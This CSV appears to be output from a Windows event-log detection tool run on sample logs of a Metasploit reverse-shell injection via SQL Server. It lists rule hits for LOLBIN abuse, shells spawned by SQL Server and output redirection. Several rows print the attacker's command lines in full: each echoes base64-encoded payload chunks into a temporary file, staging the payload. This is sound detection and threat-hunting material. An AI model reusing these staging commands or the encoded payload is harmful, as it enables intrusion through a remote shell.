Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.311 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 4gBqAP//3/4CfW6hYAbjAIXAdTlQaNcBQQBQlwQN+pWjYAZnAOsfg/4BwjehXBZYAIV7dQVQaPgAQQBQ6FMNqQCjXAbrAKplDIVodA6LVQyNFwhRUv/Qi/DrC2oB/9Mz9qYSOnUMg/7SdQr/FZjAQKqFwJoai00IM5ALxjPSiW4wi0cEZsqAzAKJTzSJygTRRwTvdRD30CzGX/f6G8Beg3gRAQDti+WSw5CQkJCQkJCQkAyQUYuji0V2UP/9TcBAADOpXcOQkZCQkJDgkJCQkIhokJBVi+yDYehTM8CwV4stDIlF7IlF8IvHM9slAEdAAIldW4ldCYld6IlFZHRNOR2EBkEAdUVohAZBAFNTU/RTcd9TjU30agFRiF1FyV31iOL2iF33iF34xsf5Af8VCMBAAIXAxQ+9gEZAAOg/GAAAg8QE6waJHYQG9AA9dQjjxwAAEAB0b/dG/wAAAQB0ZthIBtEAi1YmO7fHReq0AAAAibrJFh1TaIwBQQBqAVwRDAAAKMQMOwej2AbbAL9lhwAAlI1NDI1V4FGKTRBSUf/QRcOQIYtVDGoIUuhEAQDVi04Ig/EIC8iL8wQxAJMQAIlOCIlGBPfHAE4gAA8xgboAAPdG9QAAAgCjeItGFMdF7AIAAACJRfChCgYDADvDdRlTI9UBQQBqsuiWMQAAg8QMO8Oj6QZBAGcajU0MjVXgUYtNUFJR/9DrFGop/xVMwEAAkoGKAdQVIAQ2AOsEO8N/IYu3DGoEUui3AEsAi68IvMQIC8iLRgQNAAAgAIlOCNJGBDld/HRn/OsNquYQz6MV6zfl88G9Iej7AgAAkOsMxX/mP19+fnFSCPH6YInlMdLrDGSgW2TH0nU6re5o1WSLUjDrDPAgnuMi4SLv8nZxt4tSDJCLUhSQ6w8DqYDqQ+21l/u+T3oRnDDrDLxhTda/6H/b0M9po4tyKJDrDWK5NisF9U6iLwJT9woPt0om6wv+48qISP2Poipl+DH/kOsLdiE03/EqaUGzUwaQMcCQ6whggJyCIf/GaqyQPGGQfA+QLCCQ6wlFKUJfx9DR2YOQwc8N6wqIhGwkKJV7M2SSAcfrDxbCE5/MhOUzEEbXvXkhgUl1tpBSkOsIR2j7O96rtQ9XkOsK6OEZYZYtNIb5AYtSEJCLQjyQ6wtvHO6CtppXUZfrwgHQkItAeIXAkA+EtgEAAOsJvBHhi5cnz6vJAdDrD12ZWMG2rWEDmeWRyuaFWlCQi0gYi1ggkOsKWj6NjF2V6/wP7wHTkOsMxs4Ny3WWoZb9DEkykOsPUGhe0FYUivF+muOt2x/jhcmQD4RGAQAAkOsOvZ+yYJE+39wN+IDWXMhJizSLAdaQ6wtQFwEqgj9bn18lTzH/kOsKShDNuj3pWEjOv5DrDij9+3UKqbBF2wGyxXDuMcCQ6w4Cplr2VcWyhpYN5gTVkayQwc8NkOsOIhqtsOiPVxK+FrdCnvQB>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1084 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.311 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.311 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.313 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.583 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo x+sIyJOqipK4o6w44A+Fsv///+sJVWXfDqpkc3LGA3346wkmy805CdaC7xk7fSTrCXoq/AyR3Z+p2g+FNv///5DpDQAAAEOAGPBCPwsOEOS4SPxYi1gkAdOQZosMS+kIAAAA4ZF6dTR1EKmLWByQAdPpDgAAADzr22+JJD6d2vOvQtJpiwSLkAHQkOkMAAAApjTuBCYQRood+3hYkIlEJCSQ6QsAAAB0lVBKaS++djGx3VtbkGGQWVqQUekIAAAA2kGuwS1Wa+X/4OkIAAAAZ4kDrCJTk4mQWJDpCQAAAPjvPDpX5tzz81+Q6Q8AAACEMdRbvwr7DZMyxev56uFaixKQ6WD9///pCQAAAPUlzX6HtN4PzF2Q6Q8AAABwuGpzUMvE5pad0q5uc5G+GwEAAOkIAAAAfoWOrSYS922Q6Q8AAAD+0GR7iAeQMW7un57/X4tqQGgAEAAAVpDpDQAAAAUQfxQtECQH+leljZ1qAGhYpFPlkP/VicPpCwAAABDRzwj7WJYUuekXiceJ8ZDo9QAAAJDpCQAAAJ3VijUXjciCwl6Q8qTpCAAAANEGnMe8MHFO6KEAAADpCAAAACZD37TiNo/ckLvgHSoKaKaVvZ2QieiQ/9CQPAbpDAAAABAGNsMwWSS98MHinQ+MRgAAAJDpDwAAAPT9Rhy9AGSJMBUnVhTH34D74JDpCAAAAGzD5M415AjID4UaAAAAu0cTcm+Q6Q8AAADbVWp20uhp2BJ/MI81JZhqAFPpDAAAAC2gRnCgjOhn04XwHP/V6QgAAAATIH2zFQozkDHAZP8wkGSJIJDpCwAAAEFMN7ar3r5mm3QR/9PpCQAAAHCGRysfPIS5B+k9////6BX////86IIAAABgieUxwGSLUDCLUgyLUhSLcigPt0omMf+sPGF8Aiwgwc8NAcfi8lJXi1IQi0o8i0wReONIAdFRi1kgAdOLSRjjOkmLNIsB1jH/rMHPDQHHOOB19gN9+Dt9JHXkWItYJAHTZosMS4tYHAHTiwSLAdCJRCQkW1thWVpR/+BfX1qLEuuNXWgzMgAAaHdzMl9UaEx3JgeJ6P/QuJABAAApxFRQaCmAawD/1WoBaAoXewtoAgARXInmUFBQUEBQQFBo6g/f4P/Vl2oQVldomaV0Yf/VhcB0DP9OCHXsaPC1olb/1WoAagRWV2gC2chf/9WLNmpAaAAQAABWagBoWKRT5f/Vk1NqAFZTV2gC2chf/9UBwynGde7DgKJAAEiLAIvoDPj//13CBABADCGQkMGQkKacwgQAkJCQF4yQkCiokJBVi+yLOUmLrxSFQXQzi0257VD/FSrAQACFuXUe74uZmMBAABdqhcB1BV5dwggA/9a0gPwKAF5dwggAM8BdwggAuDtORgBdwggAkJCQkIyQkMOQ2L+QkMOQkJCQkJBFkJBViySDPUcIEABtfCNoKAdBUv8VQMBMAItFA2gxV0Bkjrpe>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb44 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.583 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.583 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.586 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.857 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo zgBohQecAFDoobH//zMMXcOQkJCQQ4+Q/JCQkLyQaCgHQez/FTzAQAAzwMOQkFWL7ItFCIvIgeEAAADAgfnLAADALgypAAD/P7gFAAAAdAW4xAAAql3DZpAXkJCQkKCL7EhFFFaIdXgZ2CjA09hIUDHMFFD/FZzAnwAj14lFFEVLi6Y1qU0RUVL/FSTAQIqFwHRKi6oMi00UhcB0AokIi1XAhdJ0C1Hogv///4PEpokCi5YUUP8V/cBAv8exFNq0AHO4dREBAKBdwhAAZgJz1wBaCrh2EQEAXiXCEHEkNZjAQF8s1oXAdQVeXcIQAP/WBYD8CgBeZcIaAJCQkAkL9uyLTRCLRQiFyVZ0HI10CP87xnMRi1UMigqEyegIdAlAXDvGcvLGAJReXcLLAJBViyNTIdyowXIAVleLgQhqL1f/02pcV4vw/9ODxBA7xnbVi/CMMHUO3zpX/9Mu8IOjCIUDdAqNRgFMXltdwgS0i8dfXvFdwgQAkKaQkNBJkFVSMoPsGCyLXRCF21f5QfwAAAAAfROLRQwz24PuALcJi0yYBM6FyXX3jQSdBAAAAFZQ/xVcwUAAncQEi/j124l99H5Ei0UMwiArxxVd+IkwEOsDC0V3iykwUf9JicFAAIPEBECJBotV/APQi0X4gsYESInJ/IlF+ETZzUX8jURAAaWJRfzKnlztQOaixAQzyYXbiUUNi/B+VPhFDBxN9CvBi03IiUX0iekMeV2N6wOLRQB41fJN7I1N/IlV8Ik3iwQHUY1V8J9SqehZBQAAi038i0V1K8GDxwQD8ItFDEiJRQyz5ot99FVNrItF+McEjwUAjSbG/QAr8AN3UP8VIMFAQHpN+IPE/TsAD/AxK8GL10k0att+NosUhwNrshSHq2jD/fOLTQgSbIk5X1uL5V3Di1XyHsOJOl9biytdw4tFCIk4oMOiW8blucNkkJCQYFWL7KHc3UUAVpzAVw+F6QEA/2j4B0EAxwX4B0GelAAAAP8VIMBAAKH0CEEAg/gCD4W0AQAAoAwIQQC+kXxYADAbdDuLPUDBQAChdMFAAIM4RX4OM8mK4IoOUf/Xw44I6xGheMFA4zPSihaLCIoEUYPgEdvAdTaKRgHrhMB1y4sNtwgEAKH8tEEAg/ihD4JfAQAuD4RZARIAgwoEdWWD+VZzI7goAAA/6UoBAACAPgB0zVb/FajBQMqLyIPE7YkN4AgFAOu/d9u4rwAbAOklAQAAgPkDdze4K2YAAOm7AQAAg/kEdwq4LEQAAOkHATYAuiIAAL3C0RvAwGODwC3p9AAAlYP4BXVVoZzIQQCFwHUeqcl1/rgyAOAAA9gAAAAzwAf5Wg+VwINDM+nIE6QAg/gCegpNBwDdAOlyAAAAg/kBxAp6PFkAAOmqAAAAM8CD+YyhlRiDwD3pmgBfAIOXXPfYG8Ak9oM0UEqJQwAAg/gBdX+jjtb/AL52CFsAhMB0O4s9aMFA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x109c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.857 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.857 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.860 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.131 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo omN0wUAAzTgBfrkzyWoBig5R/wGDxAjrEaF4wUAAM9LNFhMIKgRRg+D9hcDCCIpG7EbEwITLoQAIQQCh+ApzEIoOM8CA+UMPncCNRAA34iGD+FoMEIoOM7WA+UEPncCNRDAO6wy4c3oAAOsFuAEAAACj3AhB34tVCJ2JAtU13AhBnzPAg/4BD53ASIclLk4AAF3DkJCWkJCQkJBVi+yLRQhWiwyF5AhBAA40heQIQQCFMW8XiwQcVMRAAFD/FRjAQACFwOsGdQNeqsOLkB6FwHQNiw5QUf8VHARAAF5dw4suDIsGUlBwFRzAQABeXcOQkM2QkJAMTpA7kJBVpuyD7OVTSdKLVqWLF/XSiVX4dQ5f6jPAmIuEXcIQAN5V+ItNFIM5cmDqi9pSM8CKBpGEwIl1CDMZBombixFGiRGLPBBmiTeDwQL6TRC0yAEAAIvIgeHABwAAgPmnD5yHoAAAmb/gJQAAvsiJVfAjz4Pbvp8AAAAz0jvPiXQEiVPsdTQ7PGkwi8dk07kBAAAA6NoNAAAL+AvaRoP+JQ91/NdIi0XsiwjwJccjyzvHdQQ7y3SFi0Xsi1Xwi8vP0YvrI0yLVfz31iPwjUIBiUX0UVH4hnEPhp0BOgC++gHzEnWzg0MeM//nx69nX164FgAAAFuLfgXCEAALgHUet0DHD6SVjIoC//+JKYz/AAAA9MQrI9OHzHTTiwblU/oCdRGD/g1WLW3JdSmYZAj2ACDrH4P6A3Uchcl/kXwFg/4E66qD/i11DIXJdQiLRcH2ADAfmal9FLgCAABvO8KLHxvA99hAO9gPgqr+//+F0nQ/iz8I6wOLVfyEJUo0B4lV6rgCgeLApwAAR4D6gIl9CA8hV///dg+k8QaD4D+ZweYG6WYLriTwi5z8hcCLyuXGEEWSR1X0K8JWMwyzyU8Cfxd8CIH+AAABAHMNvUUUixBKiRCLRRDrPItFFIsCFMP+gcYAAP//g9GSiRiL0YvGuQoAcszoeQwAAGaLyItFEBLN2IHm/wPLymaJCIPAAuPOANwAP2aJwbfAAh5FEIt9DLsHhcCJRfgPhfX9//9fl1uL5V3CEBNfXrh4AgEAW4vlXcJwAJCQkMKQkJDtkJAQrpD+VZzsg+wIi1XQU1ZXizqF/4m6/HUOxV4zwFvJ5V3CEL7EffyLRRSDmwAeNpd1CDPJZosOg8YCgfn/AAAAiXUIfRZPRc9lME6JA/ZFWIgIQIlFEOlJ5gAAi8Elz/wAAD0AgAAALIQeAQAAPQDYAAB1RoP/Ag+C/gAAAGaLBovQgUwA/AAAgfoAMQAAD4X1AADEgeH/AwAAJRIDAADB4QoLwYPGCJmLc4v6gcMAlwEAiXUIg7AA6weLwZnG2Iv6i8OL17kLAAAA6FULFQAIyL4BAAATC8p0EbkFAAAA6EALAACLyEYLynXvi1UUOzIPg8D//7y4AgAAO4tVDDvG3/b8G8n32W3Bg03/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x870 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.131 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.131 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.133 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.404 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo SBK5iQKLRdCLEBL7phCLeBCF9o1MMgHmgAAAAImNEHQwi8fR+u3CCYlF2YrDJD+JTdeSFQTXiAGLw7kGsGUAnNS+AMOLTfiL2ItF/E6L+nXQi1UMCtiIWf/+AoUuiUX8D4Wy/v//X6pbi+Vd0hAAX164eBEBAFtF5V3CPAB0kbgWAHEAW4vlXZoQAJCQkJCQkBWQ7Y+QgJBV5OyL3giD6ETkEP+zDDVAAMcAsScAADPAXcN9RRSLTRAvVVBQUVJMFFcAAIPEDF3DkJCQkJCQkJCQkJCQkJCQus/s3UUQi00Mg+0QcxD/kXjBQADHeBwAswAzwP3DU1ZbdQhXvwQAawCKFkY8Y4hFEHYai0UQu2QAUQAlCgCkAJn3+wQwiLwQiAFB6wQ8REMXi0UQuwoAAAA1/wBwAJn3+wQwiAFBisIEMIgBycYBLkFPdbWLRQxfXsZBvBZbXcNVi+yD7AwJSYt1d1eDPgB3EYsGAAAAAIzPM8Bbi+VdwgwAi10Ii0MY9sQCdGV/QwyFWXXpiwNqFFAV/+jQm2n/i0+JOIB4BInTCIkE81dXNol4IFeJvFf/FaDA1wCLUwyJ0mHiQwyLSMqFyXUlizW0wLxj/9aFwHUJX15bi+VdwgwA/9ZfwgCA/AoAW4vlhcIMAOpDMIOfMDvHi0UMdCiKmDCICIsWQEqJFol7MIsOiUUMhcl1Ecf9ActRAF9eM8Bbi+VdwgyqikssVzcPhDUBAACLU1iLPlKJ3EuJ5/jonaJ2/4PbSAF1LVOBkQNrADPJiUUIOxh0T4tDWFDomPP//4tFCF9eW4vlXcIMAIlLPIlLSIlLRMdFCAAAAFR8A4t9+IX/GIadAHgA4Us8OkNEO8hyN4tDQItLOO5VGlIgUfXo6gAAAItNzzuXB8QQO/iJRQh0ZFX4UItDVAPxiUtEE8KJc1CJ2FQEUzyLU4SLQ0Q4wjn4dwKLoouBOKdE/ET4A/LUSMHpAodTi8qPVfyD4QMD3fOkAHMsdE34bPAryItFCIlbdyZ1EPpVpoWmiWH4D4S8////Ew49JxEBADBnx0PNAdsAWHFF/ItNDK3BiQbsB8dFCAAnAACLQ1iUbQ3z//8XRQhfBFvD5V02XQCLFitNDFFSUGjoMwAAAIMkED1+EQF4iUUIVQfHQygBPwAAi0UmX4kGi0UIXluL5V3CDACVkJCQ8pCQC/+QkJCQkFUQGIuLyggci30Qi0YQi04UC8HHRRIAAAAAdXOKRgiE7HTVi1YEjSgIagBRagBqAGoA3v8VDMBAAB3GdTWLNZjAQAD/mIXAdQmLTRRfXg9CvcP/1gWA/AoAPe12TgBrBbh+PgGAi5QUX16QAQCsABdd6IvqCIXAdQ6LLhRfXokCuAtmAABdw+T4dgJm+ItGDIVDdCOKTgiZyXUci05QiUgIi0ZQi70nuSAAAADo3wbOAItWDImS2PBGDBPwDFONTRBQi0Y/UVeRUP8V>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x370 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.404 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.404 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.406 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.678 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo EMBAS/vAjAczwPeJAQAAiz2YwEAAutdAfg+EG9oAAGLXBYD8CgA9ZQALAA+F/QCfAIsdnMBAAItOJYtGEIX4fBZ/HYXAdhBqABHoAwAAUc5w8AM3AOsNI8GD+P912wtf6wK1wIvSyLSLUaBS/9OLxoH/gAAAAOq/hf+4MaGECUEAi14EmsB1GFBo7ABBAC5AYRb//zHE96Ng1/oAhcB0BVP/0OtlaoGRKd43sgCLTgyDVgSNlxBqcYVR/98VksBA2cHA1QQzwOtxix2YwEAAWNOFwHRl/9OUKfwKAD1kAH35dAc9YwAhAOEsgf8CAQAAdRKLTRSLVRBOX7g8EQEAieZeXcM97fwKAJ0Si03qi1UQ7V/28xEBALIRCF3DPaZbCgD4EvpNFIsnEFtfuH4RATyJEV5dw4XAdTiLTRCFyXUSi00Uiw8QW1+4fugBAIkRJ13Di1YMhdJ0GIp1CIRodRF2VlADV4tOVH/Ren1xUIlOVAFNJYtVEFtfiRFe+TuQkJCQkJBVpexRVovtzoqELITAD4RCAAAAzE7RM8BTg/kB54lF/IlF/w+lnAAAAIvUPOX4D4SROAAA214zg///dgXPyP/rAgpLi1bwjU38agBRUFNS/xUUwEAAhcB0L4uL/ItWUItOVPfQg9EAK/gD2IlWUIX/iU5Ud8IXtAhfx0Y8AAAGsFueG+VdwgQAiz2YwEAA/9eFwHUFiUUI6wqf1wWAJAoAiUUIREX8i1ZQi/FUFtCLRQiJiFCD0QCFwPBOVHUHx+DZAABLAItFCF9bIYtrXcIEgTPAXovlmsIhB0wbkJCQkFWLoItFCI1IArhWVVVB9+mLysHpHwPRjQSVAQDfAF3CBACQkJCQDdg64JCQkCGQkFWLJItFEItNDIsdCChRUugMAAAAB8IMHZCQtpCQ0pCQVYuui1UQiUUIHFaNSv4z9leLfQyFyX5rStIzXwgUN4PGA8HqAkCK94/NQOWwUP+0njf9amQ3/oPiYtbiusHrCsDTM9tAipLex6oAoFBXihA3/opcN/+D4g/B4gIRDQbF00CEkhhpxs+IUP+KVDf/g+I/QDvxipIYxzYAiFD/fJgb+xc78n1fM8mKDD7B6QI7SoqJGMdAADvyiP3/DRQ+dXaD6APB4gRAincZ/kAAiDD/xgA96yu87j4BM9uD4gOKGcHiBMHrBAtvJYr0rMdAAIhQ/4oJg+EPihSNGMdAAIgQQBkAt0CLVeX/AAArwpdez1tdwgwAkDI4kJCQkJCQT4M9WEBBAP8pDP90JAT/a/jAQDlZw2hL/UEAplhUQQBAdCQM6JcDAABxxAzD/3Qk/qHL////99gbwFn3m0gsnMyLRCQIi0wkEAtLfnskDHUJi2IkBPfhwhAAU/fhi9iLRCQI92QkrgOEi0kkEffhA83PwhAAzMxkzMzMzMzMzMzM/yVAwUAAzIDMzMzMzOPMzFf1U63/i0TaFAvEfUVH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13b4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.678 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.678 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.680 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:20.951 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo i1QkEJLY99oV2OOJZyQUiVQkOrxEJBwLwH0Ufr50JBj32Pfag9gAiUQkHIlnJBgLwHUYi0y5GIsFJJgz0veIi9gqRCR09zOLs3FBie2LTCR+i0EkFC6yJCXR614h0dvR2AvbdfT38Yvw92QkoovIi0QkGPfmA9ELDjtUJBR30HIHO0R3+HYBTjPSi79PjQf32vdGHdoAW15fwhAAVYvsav9oYMf8AChIuUAAd6EAAAAAUGSJJQAAAADlGiBTVleJZeiD6zgAagH/FdCrQN1+BQ1UQFwAlYMNWEBBAP+3FdTAQH6LDZgLQQCJCP8V2MBAAIsNSAtBAIkIodwOQACLAKMlQEEA6J/nAACDMVANQQAAdQyJ1LlAAP8V4MBCAFnocAKTAGgMhUAARyHQbgDoWwIAAKGQXV4AiUXYjR7YUP81jAtBAI1F4FCNRdSDjUXke/+f6MBAMWjr0EAAaABf/OvoWgIAAP8VzcBAAIth4Ilm/3Xg/3XU/3Xk6ONYk9NBxDCpRdxQ/5S4wUAAi0Xsi1yLCYlN0FBR6OsBlwDHWQOLZej/ddD/FfTAQADMhczMzN3HVzMyi0SIEAvASBRIi+EkYffY99qD2ACJRCQQiXUkmpVEJBgLwH0TUVQkFNnY99qD2AArRCQYiVQkFAtedfaLTMoUi0QkEOXa9/ELRCQM9/GdnzPST3lO61OL2ItMJBSLVCQGi0QkDNGj0dnRc9HYC9t19Pfxi8j3ZCQYkfdkvBQDxsMOO1QkWXcIcr47RCQMdv/BRHwUm1ReGCsKdgwbVCQQT3kH94T32IPagNlbwhAAzMzMzMzMIKigzMwtzMyAp0BvFoD5a3MGD6/Q0/obi0XBSYSA4RXT+MPB+h+LwtPMzMzMzMzMzMzMzMxF28xRPQAQAACNOyTochSB6QCkADQtABAwlNF5PQAQAABz7CvIi7KF14vhiwiLrgRQXcyAbkBzFYD5IHMGD8fCbTPDhtAzwIDh0NPiwzPAM9LDzFNWi8UkGAtidRiLTAgUi0QkEDrS98qL2M5EJAz38YvT67aLyFBcJBSLVCQQi0QkDNPp0dvR6tF9C8l19PfzA/D3ZCQYi8iLRCQUouYD0XIOO7WgzXcIcgc7RCQMdgFOPtKLxuNbwhAAzB/MzHPMzMyA+UBzFYD5oHMGDzXQ03PDiw7O0oBBH9NPwzPAM9LDzP8l/M